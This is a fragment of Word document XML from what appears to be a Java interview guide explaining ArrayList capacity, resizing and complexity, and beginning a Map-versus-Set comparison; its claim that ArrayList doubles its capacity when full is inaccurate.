    <w:p w14:paraId="73F37A79"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE5956"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lements in the ArrayList are stored in contiguous memory locations (just like a regular array). This allows for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any element by its index, with a time complexity of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61A61FDE"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vs. Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D216981"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Refers to the total number of elements the internal array can hold without needing to resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D95C3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fers to the actual number of elements currently in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4A35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can be greater than or equal to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but they are not always the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA50B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Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6228353B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8EF8B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the ArrayList at the end, if there is space in the underlying array, the element is simply added at the next available index, which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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E86DFA"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array is full, the ArrayList will resize the array and then add the element,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due to the resizing operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD0066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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093987B"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ng an element by its index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 because the elements are stored in contiguous memory locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794D7D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD28BA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moving an element involves shifting all subsequent elements one position to the left to fill the gap,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n removing the first element).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24446EA5"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in the middle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705575C6"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insert an element in the middle of the ArrayList, all elements from the insertion point to the end need to be shifted one position to the right. This operation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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199411DC"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607DF22C"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rrayList Internal Working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221F0D5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the following example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4FEB59"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1046AE8" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61861B40"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0D03F5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1AC55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 with an initial capacity of 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E10B7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5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A52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9872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some elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5203786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A2EFB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761462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9CD6E15"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3904F7A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E9D2A85" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E74DEE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more elements than the initial capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2498DCD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6); // This will trigger an internal array resize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175C635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7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5CE96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72457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ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DEEF0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list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A846D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579A0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BDF63B"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Explanation of the Above Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C2BE5"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584CD0C6"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create an ArrayList with an initial capacity of 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F21AF1"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array has space for 5 elements at the start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04004F52"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lements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEFA002"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5 elements (1 to 5). Since the initial array capacity is 5, the elements are directly added to the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA2E70"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4E3463F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add the 6th element, the internal array is full, so the ArrayList will resize the internal array (usually by doubling its size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AECD0E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w array now has more space (e.g., 10 elements), and the elements from the old array are copied to the new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A180323"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063D5D44"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will contain the elements: [1, 2, 3, 4, 5, 6, 7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F9D7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ArrayList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB7EA8A"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An internal array of objects, holding the elements of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AD9EF3"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An integer representing the current number of elements in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7C2FE"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The total size of the internal array, which can be larger than the number of elements (the capacity grows dynamically when needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC067A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610"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B5ACF" w:rsidRPr="00CE4B95" w14:paraId="14127192" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5954982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D5D0195"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tc>
      </w:tr>
      <w:tr w:rsidR="003B5ACF" w:rsidRPr="00CE4B95" w14:paraId="03757DB6" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="229BA99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48C688A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3B5ACF" w:rsidRPr="00CE4B95" w14:paraId="08E9A61B" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D64591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at end)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DBA235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mortized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5ACF" w:rsidRPr="00CE4B95" w14:paraId="6C47AA9A" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06961ED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middle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48291CE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6624C56F" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1468D57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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14D262C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752B72C3" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BB71C4D"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 (if full)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AC57BC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bl>
    <w:p w14:paraId="1EDE9662"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3BE4A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is needed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ArrayList provides constant-time access to elements via index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C087B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equent resizing is acceptable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since resizing is done by copying elements, the occasional resize can affect performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7523E453"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read-safety is not required</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If multiple threads are involved, other thread-safe alternatives (like CopyOnWriteArrayList) should be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB4AB9"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F6E8947"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to store elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E953C30"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O(1)) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>amortized constant-time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for adding elements at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32DDA6"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can affect performance, but the overall performance of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efficient for most use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4CA94" w14:textId="78F8608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498" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEFF4F1"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4" w:name="_Toc197867368"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default size of ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w14:paraId="7333A0C9" w14:textId="58744A14" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F510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efault size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC2E4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thout specifying an initial capacity, it will be initialized with a capacity of 10. This means that the internal array that back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initially have space to hold 10 elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E789CAE"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41FAA36"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D19BC7" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F5106">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D520A0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F581F49"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B524E4"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without specifying an initial capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54EB7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26DAD7C8" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F5106">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3494D512"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capacity will be 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBEDCF8"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efault size of the ArrayList: " + list.size());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512FF03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1FF4F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060A16"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62BDE414"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but this is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not the number of elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the list.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the ArrayList will be the number of elements you actually add to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E3B74C"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grows beyond the initial capacity (for example, when you add more than 10 elements), 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internal array will be automatically increased, usually by doubling its current size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0315FE" w14:textId="63CD9D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499" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5911268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5" w:name="_Toc197867369"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to increase the size of ArrayList? By how much?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w14:paraId="749F9A5D" w14:textId="19635223" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A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ncreases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as you add more elements to the list. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., the internal array size) may need to be increased when the ArrayList reaches its current capacity limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1C61E"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he Capacity Increases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A28C4"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 ArrayList is full</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., the number of elements exceeds its current capacity), i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the internal array size by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270AC61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capacity is 10 and you add the 11th element, the ArrayList will create a new internal array with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>capacity of 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and copy all the elements to this new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D2C0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resizing continues as the number of elements grows, with each resize typically doubling the array's size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086DF430"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utomatic Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D966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EBFB367" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B52431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DE3DC6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98B7DF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76B3946" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17813183"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11 elements to trigger resizing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5255247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1; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2764B3B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5D4F15B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01346C" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F44E16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size and the capacity (size will be equal to the number of elements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208757C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of ArrayList: " + list.size());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E30DA"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E4D55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D942A5"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5DEB52F"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By default, the initial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10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD9A35E"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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the ArrayList reaches its current capacity, it will automatically double the internal array size to accommodate new elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D1814"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Cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each resizing operation (doubling the array siz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ecause the elements need to be copied into the new array. However, this resizing happens less frequently as the array grows, so the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>amortized cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> per addition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39718352"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izing the Initial Capacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C7A247"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reating an ArrayList with a custom initial capacity of 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2983D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB2D6D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ay, you can control the number of resizing operations that happen as your ArrayList grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564ACEB5" w14:textId="206C258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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A27E5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6" w:name="_Toc197867370"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Map and Set?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w14:paraId="5213767C" w14:textId="3C095903" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B6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are both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serve different purposes and have different characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB56191"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360"/>
        <w:gridCol w:w="4115"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="20927AD0" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C6CCE70"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38ABE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1A288C1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C46B62" w:rsidRPr="00CE4B95" w14:paraId="530981A9" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E7E431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CE0DF2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key-value pairs. Each key is unique, and each key maps to exactly one value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19DD1F6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unique elements (no duplicates).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="642E13B1" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EC01DC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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B43AF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Entry). Each key is unique, but the values can be duplicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EB8D77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only </w:t>
            </w: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no duplicates).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="33D4D542" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56B660F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2DB3B52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Keys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but values can be duplicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
